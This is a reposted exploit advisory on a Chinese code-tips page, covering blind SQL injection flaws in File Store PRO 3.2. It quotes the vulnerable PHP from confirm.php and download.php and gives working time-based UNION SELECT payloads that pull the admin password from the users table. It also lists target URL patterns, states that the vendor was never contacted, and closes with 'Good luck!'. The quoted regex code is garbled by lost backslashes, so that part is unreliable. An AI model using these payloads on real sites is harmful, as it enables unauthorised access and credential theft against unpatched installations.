欢迎来到福编程网,本站提供各种互联网专业知识!

File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities

发布时间:1970-01-01 作者:佚名 来源:互联网
|FileStorePRO3.2BlindSQLInjection||________________________________________|Downloadfrom:http://upoint.info/cgi/demo/fs/filestore.zip-Needadminrights:/confirm.php:[code]if(isset($_GET["folder&
| File Store PRO 3.2 Blind SQL Injection |

|________________________________________|

Download from: http://upoint.info/cgi/demo/fs/filestore.zip

- Need admin rights:

/confirm.php:

复制代码代码如下:

if(isset($_GET["folder"]) && $_GET["folder"]!="") {

$folder=$_GET["folder"];

} else {

exit("Bad Request");

}

if(isset($_GET["id"]) && $_GET["id"]!="") {

$id=$_GET["id"];

} else {

exit("Bad Request");

}

// Validate all inputs

// Added by SepedaTua on June 01, 2006 - http://www.sepedatua.info/

/********************** SepedaTua ****************************/

/* Fields:

$folder

$id

*/

$search = array ('@]*?>.*?@si',

'@<[/!]*?[^<>]*?>@si',

'@([rn])[s] @',

'@&(quot|#34);@i',

'@&(amp|#38);@i',

'@&(lt|#60);@i',

'@&(gt|#62);@i',

'@&(nbsp|#160);@i',

'@&(iexcl|#161);@i',

'@&(cent|#162);@i',

'@&(pound|#163);@i',

'@&(copy|#169);@i',

'@&#(d );@e');

$replace = array ('',

'',

'1',

'"',

'&',

'<',

'>',

' ',

chr(161),

chr(162),

chr(163),

chr(169),

'chr(1)');

$ffolder = $folder;

$fid = $id;

$folder = preg_replace($search, $replace, $folder);

$id = preg_replace($search, $replace, $id);

-----

$SQL="SELECT `".DB_PREFIX."users`.*, `".DB_PREFIX."file_list`.`filename`, `".DB_PREFIX."file_list`.`descript` ";

$SQL.=" FROM `".DB_PREFIX."file_list` LEFT JOIN `".DB_PREFIX."users` ON `".DB_PREFIX."file_list`.`user_id`=`".DB_PREFIX."users`.`id`";

$SQL.=" WHERE `".DB_PREFIX."file_list`.`id`='".$id."'";

if(!$mysql->query($SQL))

{

exit($mysql->error);

}

if($mysql->num<=0)

{

exit("Record not found");

}

POC:

' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from fstore_users where login='admin

Site: http://site.xxx/confirm.php?folder=a&id=[SQL]

- Don't need admin rights:

In /download.php:

复制代码代码如下:

if(!isset($_GET["sig"])) // direct download, no need to login

$MustLogin=1|2|4;

require_once("libs/header.php");

if(!isset($_GET["sig"])) // direct download, no need to login

$userlevel=$CurUser->getlevel();

$SQL="SELECT * FROM `".DB_PREFIX."file_list` WHERE `id`='".$fileid."'";

if(!$mysql->query($SQL))

{

exit($mysql->error);

}

POC:

' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11 from fstore_users where login='admin

Site:

http://site.xxx/download.php?id=[SQL]

Needs magic_quotes_gpc=off. Vendor not contacted !

--------------------------------------------------------------------

Site: http://rstcenter.com

Site: http://de-ce.net

Good luck !

--------------------------------------------------------------------

相关推荐